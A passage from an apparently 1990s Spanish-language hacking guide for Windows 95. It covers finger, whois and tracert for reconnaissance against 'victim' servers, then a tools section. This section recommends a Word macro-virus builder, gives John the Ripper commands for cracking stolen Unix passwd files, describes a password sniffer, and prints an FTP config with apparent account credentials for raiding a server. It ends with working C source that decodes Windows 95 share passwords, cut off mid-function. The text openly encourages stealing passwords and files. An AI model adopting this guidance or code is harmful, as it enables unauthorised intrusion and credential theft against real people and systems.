  696.   Finger se utiliza para obtener informacion de un servidor. Puede parecer
  697.   una tonteria pero es util, por ejemplo, podemos empezar a sacar los Login's
  698.   de los usuarios y empezar a adivinar sus passwords, tambien podemos
  699.   vigilar al root del servidor (cada cuanto tiempo conecta, cuando fue la
  700.   ultima vez que estuvo, etc...) y asi muchas cosas.
  701.  
  702.   La verdad es que para usar el Finger usaremos cualquier navegador, IE o
  703.   Netscape. Simplemete nos dirigimos a un url un poco especial, es un web
  704.   que permite hacer Finger a cualquier host y nos deveulve los resultados.
  705.   Esto se conoce como "Finger Gateway". El url del web es:
  706.  
  707.   http://www.hgp.med.umich.edu/cgi-bin/finger
  708.    
  709.    4h. Whois.
  710.  
  711.   La utilidad Whois, al igual que Finger es muy comun en Unix y no esta
  712.   disponible en Win95 pero comos somos asi de listos saldremos del apuro.
  713.   Tambien sirve para pedir informacion de un servidor pero no el igual que
  714.   Finger, ya que se diferencian en el tipo de informacion, el finger se suele
  715.   utilizar mucho para buscar direcciones de correo mientras que el Whois,
  716.   para averiguar informacion sobre un servidor en concreto.
  717.  
  718.   Para usar esta utilidad, ejecutamos el Telnet y nos dirigimos a un
  719.   host muy especial:
  720.  
  721.   c:\>telnet whois.internic.net
  722.  
  723.   Por supuesto Internic, una empresa privada norte ameriacana que se
  724.   encarga de controlar los dominios de Internet, y podemos usar su base
  725.   de datos para pedir informacion sobre un servidor.
  726.  
  727.   Cuando conectemos a la base de datos de Internic, escribimos "Whois nombre_
  728.   del_servidor" y nos sacara la informacion.
  729.  
  730.    telnet InterNIC > whois aol.com
  731.    Connecting to the rs Database . . . . . .
  732.    Connected to the rs Database
  733.    America Online (AOL-DOM)
  734.    12100 Sunrise Valley Drive
  735.    Reston, Virginia 22091
  736.    USA
  737.  
  738.    Domain Name: AOL.COM
  739.  
  740.    Administrative Contact:
  741.       O'Donnell, David B  (DBO3)  PMDAtropos@AOL.COM
  742.       703/453-4255 (FAX) 703/453-4102
  743.    Technical Contact, Zone Contact:
  744.       America Online  (AOL-NOC)  trouble@aol.net
  745.       703-453-5862
  746.    Billing Contact:
  747.       Barrett, Joe  (JB4302)  BarrettJG@AOL.COM
  748.       703-453-4160 (FAX) 703-453-4001
  749.  
  750.    Record last updated on 13-Mar-97.
  751.    Record created on 22-Jun-95.
  752.  
  753.    Domain servers in listed order:
  754.  
  755.    DNS-01.AOL.COM               152.163.199.42
  756.    DNS-02.AOL.COM               152.163.199.56
  757.    DNS-AOL.ANS.NET              198.83.210.28
  758.   
  759.   Como vemos hemos pedido informacion sobre AOL.COM, American On-Line. Y esto
  760.   es lo que nos ha sacado Internic. Al final podemos ver los dominios
  761.   asociados a AOL. Pues sencillo y muy util, el whois.
  762.                                                      
  763.    4i. Tracert.
  764.  
  765.   Esta utilidad que si esta implementada en Win95, nos sirve para calcular
  766.   el tiempo que tarda un paquete de un servidor hasta otro y ademas podemos
  767.   saber por cuantos servidores pasa. Muy util para sacar posibles servidores
  768.   victimas si nos llaman la atencion.
  769.  
  770.   Para usar esta utilidad, abrimos una ventana MS-DOS y escribimos Tracert,
  771.   a secas y nos sacara el menu de opciones disponible.
  772.  
  773.   c:\>tracert
  774.  
  775.   Usage:tracert [-d] [-h maximum_hops] [-j host-list] [-w timeout] target_name
  776.  
  777.   Options:
  778.        -d                 Do not resolve addresses to hostnames.
  779.        -h maximum_hops    Maximum number of hops to search for target.
  780.        -j host-list       Loose source route along host-list.
  781.        -w timeout         Wait timeout milliseconds for each reply.
  782.  
  783.   Pues como veis, no tiene ningun misterio las opciones del Tracert, por
  784.   lo que ya aprendereis su uso con la experiencia. Ahora escribimos una
  785.   direccion IP cuando invocamos al Tracert, de la siguente forma:
  786.  
  787.   c:\>tracert 198.83.210.28
  788.  
  789.   Tracing route to dns-aol.ans.net [198.83.210.28]
  790.   over a maximum of 30 hops:
  791.  
  792.   1   *        *        *     Request timed out.
  793.   2 138 ms  145 ms  135 ms 204.134.78.201
  794.   3 212 ms  191 ms  181 ms glory-cyberport.nm.westnet.net [204.134.78.33]
  795.   4 166 ms  228 ms  189 ms enss365.nm.org [129.121.1.3]
  796.   5 148 ms  138 ms  177 ms h4-0.cnss116.Albuquerque.t3.ans.net [192.103.74.45]
  797.   6 284 ms  296 ms  178 ms f2.t112-0.Albuquerque.t3.ans.net [140.222.112.221]
  798.   7 298 ms  279 ms  277 ms h14.t64-0.Houston.t3.ans.net [140.223.65.9]
  799.   8 238 ms  234 ms  263 ms h14.t104-0.Atlanta.t3.ans.net [140.223.65.18]
  800.   9 301 ms  257 ms  250 ms dns-aol.ans.net [198.83.210.28]
  801.  
  802.   Trace complete.
  803.   
  804.   Aqui podeis por todos lo sitios que ha pasado el paquete que hemos enviado
  805.   al IP 198.83.210.28. Y asi podemos con todos los servidores de Internet.
  806.  
  807.   5. Utilizacion De Tools.
  808.  
  809.   En esta seccion os explicare diferentes tools que podeis usar para hacking,
  810.   por supuesto hay que buscarlas por Internet, no pondre el url para
  811.   encontrarlas, ya que a lo mejor cuando estas leyendo esta guia ya no existe,
  812.   pero os dire como se llama el programa asi lo podras buscar ademas esto
  813.   tambien te servira para que te espabiles y sepas buscar cosas por Internet.
  814.  
  815.   Logicamente esta guia es para win95 y los programas que explicare seran
  816.   para win95 pero tambien me veo obligado a explicar varias tools que no
  817.   son de win95 propiamente sino de MS-DOS pero que son necesarias y ademas
  818.   corren en modo MS-DOS de win95.
  819.  
  820.    5a. Skamwerks lab version 1.1b
  821.  
  822.   Este programa es un util herramienta que nos ayuda a crear de forma rapida
  823.   virus macro, o sea para el Word. Tiene que estar instalado el Word para
  824.   que este programa nos funcione.
  825.  
  826.   Al ejecutar el programa nos aparecera una ventana con 2 botones los caules
  827.   son las 2 opciones que podemos escoger "Virii Wizard" o "Advanced Users".
  828.   El "virii Wizard" es la opcion, si no sabemos muy bien como crear un virus
  829.   de macro ya que nos moveremos por varios menus y crearemos un virus de
  830.   forma rapida y facilmente. La otra opcion, "Advanced Users" es para
  831.   aquellos que sepan de Word Basic, el lenguaje de programacion del Word, ya
  832.   que podemos meter codigo Word basic directamente y asi crear un virus a
  833.   nuestro gusto.
  834.  
  835.   Como este no es un curso sobre virus, no me voy a enrollar sobre la
  836.   utilizacion exacta del programa. En mi opinion es un buen programa,
  837.   en ingles :) programado en C++.
  838.  
  839.    5b. WaReZ! Version 95.12.31
  840.  
  841.   Este programa es un cliente FTP que muestra los directorios ocultos en un
  842.   servidor, util si nos metemos en algun sitio sospechoso. Como ya es
  843.   costumbre para que nos funcione tenemos que tener instalado el WINSOCK.DLL
  844.   correctamente.
  845.  
  846.   Al igual que antes tampoco hay que explicar mucho sobre este programa ya
  847.   que su Interface es igual que el cliente WS_FTP que suele ser muy familiar
  848.   para todos, por lo que no encontraremos mucha dificultad en su manejo.
  849.  
  850.    5c. John the ripper v1.4.
  851.  
  852.   Esta magnifica tool no es propiamente de win95 pero seria un pecado no
  853.   hablar de ella, cuando corre sobre win95 de maravilla (bueno, dentro de lo
  854.   que cabe :). John, como se le conoce, sirve para crackear un fichero unix
  855.   de password (el conocido etc/passwd, como ya digo aprended algo de unix).
  856.  
  857.   Cuando robemos un fichero passwd de un servidor, lo que tenemos que hacer
  858.   es usar el John para sacar cuentas, pero no solo basta esto sino tambien
  859.   necesitamos un buen diccionario y una combinacion de suerte y paciencia.
  860.  
  861.   Supongamos que ya tenemos todo (fichero passwd, John y un diccionario),
  862.   entonces tenemos que abrir una ventana MS-DOS y llamar al John, si lo
  863.   llamamos sin nigun parametro nos saldran un listado de opciones, esto seria
  864.   asi:
  865.  
  866.   c:\>john
  867.  
  868.   Usage: john [flags] [passwd files]
  869.   Flags:-pwfile:<file>[,..]     specify passwd file(s)
  870.         -wordfile:<file> -stdin wordlist mode, read words from <file> or stdin
  871.         -rules                  enable rules for wordlist mode
  872.         -incremental[:<mode>]   incremental mode [using john.ini entry <mode>]
  873.         -single                 single crack mode
  874.         -external:<mode>        external mode, using john.ini entry <mode>
  875.         -restore[:<file>]       restore session [from <file>]
  876.         -makechars:<file>       make a charset, <file> will be overwritten
  877.         -show                   show cracked passwords
  878.         -test                   perform a benchmark
  879.         -users:<login|uid>[,..] crack this (these) user(s) only
  880.         -shells:[!]<shell>[,..] crack users with this (these) shell(s) only
  881.         -salts:[!]<count>      crack salts with at least <count> accounts only
  882.         -lamesalts              assume plaintext passwords were used as salts
  883.         -timeout:<time>         abort session after a period of <time> minutes
  884.         -list                   list each word
  885.         -beep -quiet            beep or don't beep when a password is found
  886.         -noname -nohash        don't use memory for login names or hash tables
  887.         -des -md5               force DES or MD5 mode
  888.  
  889.   Veis? :), y como siempre no explicare que es cada opcion os lo dejo para
  890.   que jugueis vosotros solitos!. Ahora, ya podemos crackear el fichero,
  891.   para ello escogermos la opcion "single", ya que el john no nos pedira
  892.   un fichero de diccionario, si fuese el caso que no tenemos, ponemos:
  893.  
  894.   c:\>john -single passwd
  895.  
  896.   Y el John se pondra a trabajar, cuando halla acabo creara un fichero
  897.   llamado "John.pot" donde se almacenaran los passwords encriptados con
  898.   su correspodiente passwords desencriptado (esta definicion no es del
  899.   todo correcta pero es para que lo entendais) y ya tenemos unas cuentas
  900.   de acceso al servidor.
  901.  
  902.   Este metodo va bien para la primera pasado con el John pero luego conviene
  903.   usar un diccionario y con el diccionario seria de la siguiente manera:
  904.  
  905.   c:\>john -wordfile:spain.txt passwd
  906.  
  907.   El John seguiria el mismo proceso antes descrito, por supuesto si el
  908.   fichero "John.pot" esta creado ya, les añadira los resultados obtenidos
  909.   a este fichero, por cierto este fichero tiene atributo de solo lectura.
  910.  
  911.   Pues aqui se acaba la explicacion del John, que seguro que ya aprendereis
  912.   a manejar correctamente. Referente a los diccionarios hay varias
  913.   herramientas que corren bajo MS-DOS que crean diccionarios o tambien
  914.   podeis buscar por Internet ya que hay varios web's llenos de diccionarios.
  915.  
  916.    5d. Gobbler v 2.1.
  917.  
  918.   Volvemos a la carga con otro programa que no es del win95 propiamente, pero
  919.   es un sniffer que podemos usar bajo win95 en una red Ethernet. Un Sniffer
  920.   para aquellos que no sepan, es un programa que captura los paquetes que
  921.   pasan por una red y asi se pueden conseguir logins, passowrds u otro tipo
  922.   de informacion que querramos, logicamente si los paquetes estan encriptados,
  923.   esto dificultara el proceso, ya que habra que desencriptarlos si se puede.
  924.                                                              
  925.   Como siempre abrimos una ventana y ejecutamos el programa de la siguiente
  926.   manera:
  927.  
  928.   c:\>gobbler
  929.  
  930.   Y se activara el programa y veremos una serie de ventanas, en este punto,
  931.   pulsamos el <ESC> y saldra una ventana con un menu. Ahora tenemos que
  932.   configurar el programa para nuestra red, la verdad es que es muy sencillo
  933.   de utilizar, con un poco de practica dominaremos este sniffer facilmente.
  934.   Como sugerencia conviene leer el fichero de documentacion que trae, ya
  935.   que explica como configurar el programa.
  936.  
  937.    5e. Modificando el WS_FTP.
  938.  
  939.   El famoso cliente ftp WS_FTP, se le puede añadir un host remoto el cual
  940.   esconde mucho software interesante. Esta opcion no esta por defecto,
  941.   simplemente hay que añadir una lineas en el fichero "WS_FTP.ini".
  942.   Tenemos que añadir, al principio del fichero:
  943.  
  944.    [208.128.143.19]
  945.    HOST=24.48.3.45
  946.    UID=cmw
  947.    PWD=636E79
  948.    LMASK=
  949.    RMASK=
  950.    RETRIES=20
  951.    PASVMODE=0
  952.    COMMENT=
  953.  
  954.   Simple, verdad? Pues ahora cuando le digamos al cliente que se diriga al
  955.   host 208.128.143.19 (que no es la dirrecion real, pero da igual). Pues
  956.   que os divertais con esta cuenta :) y coged todo lo que podais, porque
  957.   a saber cuanto tiempo estara vigente.
  958.  
  959.    5f. Sharepasswd.
  960.  
  961.   Este programa desencripta el passorwd de win95. Esta en lenguaje C, como
  962.   supongo todo el mundo tiene que tener un compilador en C y si no ya estas
  963.   buscando uno, que hay muchos y gratis por Internet. No veo la necesidad
  964.   de explicaros el programa ya que tambien incluyo la explicacion del
  965.   autor la cual esta muy bien, logicamente.
  966.  
  967. /* This program takes an 'encrypted' Windows 95 share password and decrypts it
  968.  * Look at:
  969.  * HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Network\LanMan
  970.  * to find a machine's shares.  Within the data for each share are two
  971.  * registry entries, Parm1enc and Parm2enc.  Parm1enc is the "Full access"
  972.  * password.  Parm2enc is the "Read only" password.
  973.  *
  974.  * David Ross  2/9/96
  975.  * snakey@cs.umd.edu
  976.  *
  977.  * Do not distribute this program for any commercial purpose without first
  978.  * contacting me for permission.
  979.  *
  980.  * DO NOT USE THIS PROGRAM FOR ILLEGAL OR UNETHICAL PURPOSES!
  981.  *
  982.  * A technical description of the 'code' can be found later on in this
  983.  * document. 
  984.  *
  985.  * Oh yeah...  a totally unsolicited self promotion here...  If anyone has
  986.  * a job for a junior year Computer Science student for summer '96, please
  987.  * let me know!  I'm familiar with Windows and Mac networking (especially 
  988.  * involving TCP/IP), fluent in C and C++, and working on becoming a
  989.  * proficient Windows programmer.
  990.  *
  991.  */
  992.  
  993. #include <stdio.h>
  994. #include <string.h>
  995.  
  996. #define BUFFER 30
  997.  
  998. int DecodeCharOne(unsigned char *);
  999. int DecodeCharTwo(unsigned char *);
  1000. int DecodeCharThree(unsigned char *);
  1001. int DecodeCharFour(unsigned char *);
  1002. int DecodeCharFive(unsigned char *);
  1003. int DecodeCharSix(unsigned char *);
  1004. int DecodeCharSeven(unsigned char *);
  1005. int DecodeCharEight(unsigned char *);
  1006.  
  1007. main() {
  1008.  
  1009.   int i;           /* Generic counter */
  1010.   int eocc = 0;    /* Records if there has been an error */
  1011.  
  1012.   /* The following structure stores the encoded bytes.  Decoded values
  1013.    * replace the encoded values as the decoding process moves along
  1014.    * The initial values show here are not used and are unimportant
  1015.    */
  1016.   unsigned char mybytes[] = { 0x15, 0xba, 0x6d, 0x86, 0x73, 0x89, 0xf4, 0x4a };
  1017.   unsigned short tempshort;   /* Used as a go-between from sscanf() to
  1018.                  mybytes[] so unaligned data accesses
  1019.                  don't occur */
  1020.  
  1021.   int goupto = 0;  /* Records how many characters there are to be decoded */
  1022.   
  1023.   /* The following code handles input */
  1024.   char inpt[BUFFER];
  1025.   char *inptptr;
  1026.   
  1027.   printf("Input the byte code in hex (ex: 76 d5 09 e3): ");
  1028.   fgets(inpt, BUFFER, stdin);
  1029.   
  1030.   inptptr = strtok(inpt, " ");
  1031.   if (inpt[0] != '\n')
  1032.     while ((inptptr != NULL) && (goupto < 8)) {
  1033.       sscanf(inptptr, "%hx", &tempshort);
  1034.       mybytes[goupto++] = tempshort;
  1035.       inptptr = strtok(NULL, " ");
  1036.     }
  1037.   
  1038.   /* Decode all the characters.  I could have made this stop immediately
  1039.    * after an error has been found, but it really doesn't matter
  1040.    */
  1041.   if (!DecodeCharOne(&mybytes[0])) eocc = 1;
  1042.   if (!DecodeCharTwo(&mybytes[1])) eocc = 1;
  1043.   if (!DecodeCharThree(&mybytes[2])) eocc = 1;
  1044.   if (!DecodeCharFour(&mybytes[3])) eocc = 1;
  1045.   if (!DecodeCharFive(&mybytes[4])) eocc = 1;
  1046.   if (!DecodeCharSix(&mybytes[5])) eocc = 1;
  1047.   if (!DecodeCharSeven(&mybytes[6])) eocc = 1;
  1048.   if (!DecodeCharEight(&mybytes[7])) eocc = 1;
  1049.  
  1050.   /* If the password could be decoded, print it */
  1051.   if (eocc) printf("The encrypted password is invalid.\n");
  1052.   else {
  1053.     printf("The decoded password is: \"");
  1054.     for (i = 0; i < goupto; i++) printf("%c",mybytes[i]);
  1055.     printf("\"\n");
  1056.   }
  1057. }  /* End of main() */
  1058.  
  1059. /*
  1060.  * I will document this function, but not the seven other functions
  1061.  * which decode the subsequent seven characters.  All of these functions
  1062.  * are essentially the same.  Multiple functions are necessary though
  1063.  * because each column of the password has a different set of encoding
  1064.  * patterns.
  1065.  *
  1066.  * The following section will attempt to explain the encoding scheme
  1067.  * for share passwords as stored in the Windows 95 registry.  I will
  1068.  * try to explain this as clearly as I can, however I really have no
  1069.  * background in encryption.  If you have any questions, please feel
  1070.  * free to send them to me at snakey@cs.umd.edu.
  1071.  *
  1072.  * First off, share passwords can be anywhere from one character to
  1073.  * eight.  "Read only" passwords and "Full access" passwords both use
  1074.  * the same encoding scheme, and so they both can be decoded by this
  1075.  * program.  There is a one-to-one relationship between the number of
  1076.  * characters in a password and the number of bytes in the encoded
  1077.  * password stored in the registry.  In fact, each encoded byte directly
  1078.  * corresponds to the letter in the corresponding column of the
  1079.  * unencoded password!  Ie: If I change a password "passwd" to "masswd",
  1080.  * only the first byte of the encrypted password will change.  Knowing
  1081.  * this, it is easy to see that all that needs to be done to decode
  1082.  * the password is to find a mapping from an encoded byte to a decoded
  1083.  * letter.  That's what this program does.  Unfortunately, things get
  1084.  * a little tricky because a letter in the first column of a password
  1085.  * is encoded using a slightly different algorithm than a letter
  1086.  * in the second column, and so on.
  1087.  *
  1088.  * There is another complexity which we do not really need to worry
  1089.  * about to a great extent, but we still need to be aware of.  Many
  1090.  * characters, when entered into a password, map to the same encoded
  1091.  * byte.  The best example of this is that both 'A' and 'a' are the
  1092.  * same as far as share passwords are concerned.  There are numerous
  1093.  * other examples of this, and this allows us to effectively limit the
  1094.  * range of characters we need to be able to decode.  The range of
  1095.  * ASCII values we will have to be able to decode turns out to be
  1096.  * from 32 to 159.  ASCII values higher than 159 tend to map to
  1097.  * encoded bytes which also represent more normal ASCII values.  So
  1098.  * if a user manages to create a password with high ASCII values
  1099.  * in it, that password will still be decoded by this program.
  1100.  * Although the decoded password won't look the same as the original,
  1101.  * it will work just as well.
  1102.  *
  1103.  * With all of the preliminaries out of the way, I can now move on
  1104.  * to describing the mapping from an encoded byte to it's corresponding
  1105.  * ASCII value.  I think the best way to describe this would be through
  1106.  * a picture of exactly how the characters from 32 to 63 are mapped
  1107.  * out in the code for the first letter in a password.  This table goes
  1108.  * beyond the 80 column format maintained in the rest of this document,
  1109.  * but it is really the best solution.  If the table below doesn't look
  1110.  * right, load this file up in a text editor that supports greater than
  1111.  * 80 columns.
  1112.  *
  1113.  *   Encoded byte (hex)    - 1F 1E 1D 1C 1B 1A 19 18 17 16 15 14 13 14 11 10
  1114.                               0F OE 0D 0C 0B 0A 09 08 07 06 05 04 03 02 01 00
  1115.  *   ASCII value (decimal) - 42 43 40 41 46 47 44 45 34 35 32 33 38 39 36 37
  1116.                               58 59 56 57 62 63 60 61 50 51 48 49 54 55 52 53
  1117.  *   Pair #                - |_6_| |_5_| |_8_| |_7_| |_2_| |_1_| |_4_| |_3_|
  1118.                               |14_| |13_| |16_| |15_| |10_| |_9_| |12_| |11_|
  1119.  *   Quad #                - |__________2__________| |__________1__________|
  1120.                               |__________3__________| |__________4__________|
  1121.  *   32 byte block #       - |______________________________________________
  1122.                               1______________________________________________|
  1123.  *
  1124.  * The "Pair #", "Quad #", and "32 byte block #" rows each are there to
  1125.  * make the general ordering of the code more visible.  The first thing to
  1126.  * note is that the range of encoded byte values runs from 00 to 1f.  This
  1127.  * will not always be the case for the first set of 32 characters.  In
  1128.  * fact, the next set of 32 characters (ASCII 64 to ASCII 95) is not in
  1129.  * the range of 20 to 3f in encoded form.  I never concerned myself with
  1130.  * predicting exactly where each of the four 32 byte ranges are aligned
  1131.  * within the range of 0 to 256.  In my decoding scheme, I simply specify
  1132.  * the location of the first character in a 32 byte block (which I have
  1133.  * pre-determined via experimentation) and determine the locations of the
  1134.  * rest of the characters in the block relative to the inital value.  This
  1135.  * amounts to a total of four hand-decoded characters for the entire code.
  1136.  *
  1137.  * From a starting point which is given (in this case the fact that ASCII
  1138.  * 32 is encoded as 0x15), my decoding scheme follows a pattern that is
  1139.  * probably already apparent to you if you have examined the above table
  1140.  * closely.  First, if the encoded byte number is odd, it simple subtracts
  1141.  * one from this byte number to get the byte number of the encoded form of
  1142.  * the subsequent character.  This is much more simple than it sounds.
  1143.  * As an example, given that the code for ASCII 32 is 0x15, the program
  1144.  * knows that the code for ASCII 33 must be 0x14.  The tricky part is that
  1145.  * this is not always true for every code.  Recall that there is a different
  1146.  * coding scheme for each of the 8 columns in a password, and that the above
  1147.  * table only describes the coding scheme for the first column.  Other columns
  1148.  * reverse this relationship between the two ASCII values of a certain pair.
  1149.  *
  1150.  * Pairs are grouped into units of four, appearing in a predefined pattern.
  1151.  * In this case, the first pair (by first I mean the pair with the lowest
  1152.  * set of ASCII values) is put in the second slot of a quad (which contains
  1153.  * four pairs).  The second pair is put in the first slot, the third is put
  1154.  * in the fourth quad, and the fourth is put in the third quad.  This changes
  1155.  * depending on the specific code used (of the 8 possible).
  1156.  *
  1157.  * Quads also fill a block in the same manner, however the ordering is NOT
  1158.  * necessarily the same as the way pairs fit into quads!  As I described
  1159.  * above, there are four blocks, and they fit into the entire range of
  1160.  * 128 values just as pairs fit into quads and quads fit into blocks,
  1161.  * via a pattern determined by whoever invented this encoding scheme.  It
  1162.  * is important to realize that the range of 128 possible encoded
  1163.  * values can be anywhere within the range of 0 to 256.  Ie: One block can
  1164.  * be positioned from 0x00 to 0x1f, while another block in the same code
  1165.  * can be positioned from 0xa0 to 0xbf.
  1166.  *
  1167.  * I realize that the above description is a bit complex, and it doesn't
  1168.  * really cover much of _how_ my program decodes the the encoded values.
  1169.  * If you honestly can't understand a word I've said, just go back to
  1170.  * the table and really take a long look at it.  Print it out, put it
  1171.  * under your pillow when you go to sleep.  Sooner or later the order
  1172.  * of it all will dawn on you and you should be able to step through
  1173.  * my code and see how it derives its answer, at least for the
  1174.  * DecodeCharOne() routine.  Seven other tables (which I have rough
  1175.  * copies of here on notebook paper) were needed to come up with
  1176.  * the seven other decoders for the seven other character places.
  1177.  *
  1178.  */
  1179.  
  1180. int DecodeCharOne(unsigned char *mychar) {
  1181.   int i = 0;        /* Keeps track of the decoded character # minus 32 */
  1182.   int cletter = 1;  /* Sets the current letter of the 8 char quad */
  1183.   int blockl1 = 1;  /* Sets the current quad */
  1184.   int blockl2 = 1;  /* Sets the current 32 char block */
  1185.   int retval = 1;
  1186.   /* We are on this col of the table: */
  1187.   unsigned char code = 0x15;    /* The code for a space */
  1188.   
  1189.   /* This is the main loop.  It walks through each decoded character, finds
  1190.    * its corresponding encoded value, and looks to see if that's the same as
  1191.    * the encoded value we are looking for.  If it is, we have found our
  1192.    * decoded character!
  1193.    */
  1194.   while((i<256) && (code != *mychar)) {
  1195.     switch (cletter) {
  1196.     case 1:
  1197.       code--;
  1198.       cletter++;
  1199.       break;
  1200.     case 2:
  1201.       code += 3;
  1202.       cletter++;
  1203.       break;
  1204.     case 3:
  1205.       code--;
  1206.       cletter++;
  1207.       break;
  1208.     case 4:
  1209.       code -= 5;
  1210.       cletter++;
  1211.       break;
  1212.     case 5:
  1213.       code--;
  1214.       cletter++;
  1215.       break;
  1216.     case 6:
  1217.       code+=3;
  1218.       cletter++;
  1219.       break;
  1220.     case 7:
  1221.       code--;
  1222.       cletter++;
  1223.       break;
  1224.     case 8:
  1225.       cletter = 1;
  1226.       switch (blockl1) {    /* After we hit character number 8, we have */
  1227.       case 1:               /* to do a relative jump to the next quad */
  1228.     code += 11;
  1229.     blockl1++;
  1230.     break;
  1231.       case 2:
  1232.     code -= 21;
  1233.     blockl1++;
  1234.     break;
  1235.       case 3:
  1236.     code += 11;
  1237.     blockl1++;
  1238.     break;
  1239.       case 4:
  1240.     blockl1 = 1;
  1241.     switch (blockl2) {       /* After we hit the last quad, we have to */
  1242.     case 1:                  /* jump to the next 32 character block. */
  1243.       code = 0x75;
  1244.       blockl2++;
  1245.       break;
  1246.     case 2:
  1247.       code = 0x55;
  1248.       blockl2++;
  1249.       break;
  1250.     case 3:
  1251.       code = 0xb5;
  1252.       blockl2++;
  1253.       break;
  1254.     case 4:
  1255.       code = 0x15;
  1256.       blockl2 = 1;
  1257.       break;
  1258.     }
  1259.     break;
  1260.       }
  1261.       break;
  1262.     }
  1263.     i++;
  1264.   }
  1265.   if (i == 256) retval = 0;
  1266.   else *mychar = i + 32;
  1267.   return retval;
  1268. }  /* End of DecodeCharOne() */
  1269.  
  1270. int DecodeCharTwo(unsigned char *mychar) {
  1271.   int i = 0;
  1272.   int cletter = 1;
  1273.   int blockl1 = 1;
  1274.   int blockl2 = 1;
  1275.   int retval = 1;
  1276.   unsigned char code = 0xba;    /* The code for a space */
  1277.   while((i<256) && (code != *mychar)) {
  1278.     switch (cletter) {
  1279.     case 1:
  1280.       code++;
  1281.       cletter++;
  1282.       break;
  1283.     case 2:
  1284.       code -= 3;
  1285.       cletter++;
  1286.       break;
  1287.     case 3:
  1288.       code++;
  1289.       cletter++;
  1290.       break;
  1291.     case 4:
  1292.       code += 5;
  1293.       cletter++;
  1294.       break;
  1295.     case 5:
  1296.       code++;
  1297.       cletter++;
  1298.       break;
  1299.     case 6:
  1300.       code -= 3;
  1301.       cletter++;
  1302.       break;
  1303.     case 7:
  1304.       code++;
  1305.       cletter++;
  1306.       break;
  1307.     case 8:
  1308.       cletter = 1;
  1309.       switch (blockl1) {
  1310.       case 1:
  1311.           code -= 11;
  1312.     blockl1++;
  1313.     break;
  1314.       case 2:
  1315.     code -= 11;
  1316.     blockl1++;
  1317.     break;
  1318.       case 3:
  1319.     code -= 11;
  1320.     blockl1++;
  1321.     break;
  1322.       case 4:
  1323.     blockl1 = 1;
  1324.     switch (blockl2) {
  1325.     case 1:
  1326.       code = 0xda;
  1327.       blockl2++;
  1328.       break;
  1329.     case 2:
  1330.       code = 0xfa;
  1331.       blockl2++;
  1332.       break;
  1333.     case 3:
  1334.       code = 0x1a;
  1335.       blockl2++;
  1336.       break;
  1337.     case 4:
  1338.       code = 0xba;
  1339.       blockl2 = 1;
  1340.       break;
  1341.     }
  1342.     break;
  1343.       }
  1344.       break;
  1345.     }
  1346.     i++;
  1347.   }
  1348.   if (i == 256) retval = 0;
  1349.   else *mychar = i + 32;
  1350.   return retval;
  1351. }  /* End of DecodeCharTwo() */
  1352.  
  1353. int DecodeCharThree(unsigned char *mychar) {
  1354.   int i = 0;
  1355.   int cletter = 1;
  1356.   int blockl1 = 1;
  1357.   int blockl2 = 1;
  1358.   int retval = 1;
  1359.   unsigned char code = 0x6d;    /* The code for a space */
  1360.   while((i<256) && (code != *mychar)) {
  1361.     switch (cletter) {
  1362.     case 1:
  1363.       code--;
  1364.       cletter++;
  1365.       break;
  1366.     case 2:
  1367.       code += 3;
  1368.       cletter++;
  1369.       break;
  1370.     case 3:
  1371.       code--;
  1372.       cletter++;
  1373.       break;
  1374.     case 4:
  1375.       code -= 5;
  1376.       cletter++;
  1377.       break;
  1378.     case 5:
  1379.       code--;
  1380.       cletter++;
  1381.       break;
  1382.     case 6:
  1383.       code += 3;
  1384.       cletter++;
  1385.       break;
  1386.     case 7:
  1387.       code--;
  1388.       cletter++;
  1389.       break;
  1390.     case 8:
  1391.       cletter = 1;
  1392.       switch (blockl1) {
  1393.       case 1:
  1394.         code -= 5;
  1395.         blockl1++;
  1396.     break;
  1397.       case 2:
  1398.         code += 27;
  1399.         blockl1++;
  1400.         break;
  1401.       case 3:
  1402.         code -= 5;
  1403.         blockl1++;
  1404.         break;
  1405.       case 4:
  1406.     blockl1 = 1;
  1407.     switch (blockl2) {
  1408.     case 1:
  1409.       code = 0x0d;
  1410.       blockl2++;
  1411.       break;
  1412.     case 2:
  1413.           code = 0x2d;
  1414.           blockl2++;
  1415.           break;
  1416.     case 3:
  1417.           code = 0xcd;
  1418.           blockl2++;
  1419.           break;
  1420.     case 4:
  1421.       code = 0x6d;
  1422.       blockl2 = 1;
  1423.           break;
  1424.     }
  1425.     break;
  1426.       }
  1427.       break;
  1428.     }
  1429.     i++;
  1430.   }
  1431.   if (i == 256) retval = 0;
  1432.   else *mychar = i + 32;
  1433.   return retval;
  1434. }  /* End of DecodeCharThree() */
  1435.  
  1436. int DecodeCharFour(unsigned char *mychar) {
  1437.   int i = 0;
  1438.   int cletter = 1;
  1439.   int blockl1 = 1;
  1440.   int blockl2 = 1;
  1441.   int retval = 1;
  1442.   unsigned char code = 0x86;    /* The code for a space */
  1443.   while((i<256) && (code != *mychar)) {
  1444.     switch (cletter) {
  1445.     case 1:
  1446.       code++;
  1447.       cletter++;
  1448.       break;
  1449.     case 2:
  1450.       code -= 3;
  1451.       cletter++;
  1452.       break;
  1453.     case 3:
  1454.       code++;
  1455.       cletter++;
  1456.       break;
  1457.     case 4:
  1458.       code -= 3;
  1459.       cletter++;
  1460.       break;
  1461.     case 5:
  1462.       code++;
  1463.       cletter++;
  1464.       break;
  1465.     case 6:
  1466.       code -= 3;
  1467.       cletter++;
  1468.       break;
  1469.     case 7:
  1470.       code++;
  1471.       cletter++;
  1472.       break;
  1473.     case 8:
  1474.       cletter = 1;
  1475.       switch (blockl1) {
  1476.       case 1:
  1477.         code += 13;
  1478.         blockl1++;
  1479.     break;
  1480.       case 2:
  1481.         code += 13;
  1482.         blockl1++;
  1483.         break;
  1484.       case 3:
  1485.         code += 13;
  1486.         blockl1++;
  1487.         break;
  1488.       case 4:
  1489.     blockl1 = 1;
  1490.     switch (blockl2) {
  1491.     case 1:
  1492.           code = 0xe6;
  1493.           blockl2++;
  1494.       break;
  1495.     case 2:
  1496.           code = 0xc6;
  1497.           blockl2++;
  1498.           break;
  1499.     case 3:
  1500.           code = 0x26;
  1501.           blockl2++;
  1502.           break;
  1503.     case 4:
  1504.       code = 0x86;
  1505.           blockl2 = 1;
  1506.           break;
  1507.     }
  1508.     break;
  1509.       }
  1510.       break;
  1511.     }
  1512.     i++;
  1513.   }
  1514.   if (i == 256) retval = 0;
  1515.   else *mychar = i + 32;
  1516.   return retval;
  1517. }   /* End of DecodeCharFour() */
  1518.  
  1519. int DecodeCharFive(unsigned char *mychar) {
  1520.   int i = 0;
